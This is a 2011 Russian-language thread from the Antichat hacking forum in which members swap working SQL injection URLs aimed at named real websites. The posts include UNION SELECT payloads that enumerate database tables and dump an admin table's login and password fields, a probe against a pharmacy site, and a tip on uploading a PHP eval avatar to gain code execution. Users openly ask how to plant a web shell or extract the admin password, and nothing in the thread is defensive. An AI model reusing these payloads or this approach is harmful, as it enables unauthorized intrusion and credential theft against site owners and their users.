HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.09.2011, 17:16
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

Регайся в ресурсе и загрузи в профиле eval аватарку и так же вызови файл

http://uk.generic4all.com/upload_files/product_images/myevilavatar.png/.php

прочитай еще это http://habrahabr.ru/blogs/sysadm/100961/
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #2  
Старый 28.09.2011, 21:17
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Какая установлена база на сайте? MySQL, Orale, PostgreSQL и Ibase не определяются , что дальше делать не знаю.

http://www.pharmaoffshore[antigoogle].com/customer_testimonials.php?testimonial_id=-4+union+select+null,null,null,null,null,null,null, null,null+--+
 
Ответить с цитированием

  #3  
Старый 30.09.2011, 13:09
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами: 8334326

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201, 2,3,4,concat(table_schema,0x2e,TABLE_NAME)%20FROM% 20INFORMATION_SCHEMA.TABLES#
Что мсжно делать дальше?
 
Ответить с цитированием

  #4  
Старый 30.09.2011, 13:18
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от .Light.  
Что мсжно делать дальше?
Код HTML:
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABLES
 
Ответить с цитированием

  #5  
Старый 30.09.2011, 15:13
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами: 8334326

Репутация: 0
По умолчанию

Цитата:
Сообщение от d1v  
Код HTML:
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABLES
Как можно залить шелл??Или выдернуть пасс админа?
 
Ответить с цитированием

  #6  
Старый 30.09.2011, 15:17
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от .Light.  
Как можно залить шелл??Или выдернуть пасс админа?
а ты статейки почитай милок...не все же за тебя делать надо.
 
Ответить с цитированием

  #7  
Старый 30.09.2011, 15:30
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами: 8334326

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
а ты статейки почитай милок...не все же за тебя делать надо.
До меня быстрей доходит на примерах.
 
Ответить с цитированием

  #8  
Старый 30.09.2011, 17:37
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от er9j6@  
Какая установлена база на сайте? MySQL, Orale, PostgreSQL и Ibase не определяются , что дальше делать не знаю.
http://www.pharmaoffshore[antigoogle].com/customer_testimonials.php?testimonial_id=-4+union+select+null,null,null,null,null,null,null, null,null+--+
Если честно - я не увидел тут скулю.
 
Ответить с цитированием

  #9  
Старый 30.09.2011, 17:51
Kuteke
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
С нами: 8357366

Репутация: 6
По умолчанию

>До меня быстрей доходит на примерах.

Цитата:
Сообщение от None  
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201, 2,3,4,group_concat(login,0x3a,password)%20FROM%20j b_admin
И мне помогите со скульей:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//cdo.kz/ru/default/index/search?q={SQL-CODE}[/COLOR][/COLOR] 
 
Ответить с цитированием

  #10  
Старый 30.09.2011, 18:51
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами: 9128075

Репутация: 3
По умолчанию

Цитата:
Сообщение от Kuteke  
>До меня быстрей доходит на примерах.
И мне помогите со скульей:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//cdo.kz/ru/default/index/search?q={SQL-CODE}[/COLOR][/COLOR] 
по-моему, скули нету...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...